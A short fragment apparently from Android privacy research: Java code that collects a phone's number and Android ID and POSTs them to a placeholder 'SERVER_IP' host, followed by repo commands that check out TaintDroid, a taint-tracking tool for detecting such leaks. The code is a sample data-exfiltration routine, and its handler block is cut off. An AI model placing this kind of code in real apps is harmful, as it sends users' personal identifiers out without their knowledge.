RequestParams params = new RequestParams();
String imei = telephonyManager.getDeviceId();
String androidId = android.provider.Settings.Secure.ANDROID_ID;
String phone = telephonyManager.getLine1Number();
params.put("phone", phone);
params.put("androidId", androidId);
ah.post("http://SERVER_IP:80", params, new AsyncHttpResponseHandler(){
@Override
public void onSuccess(String arg0) {
super.onSuccess(arg0);
}
repo sync
repo forall dalvik libcore frameworks/base frameworks/native system/vold device/samsung/crespo device/samsung/tuna \
packages/apps/TaintDroidNotify -c 'git checkout -b taintdroid-4.1.1_r6 --track github/taintdroid-4.1.1_r6 && git pull'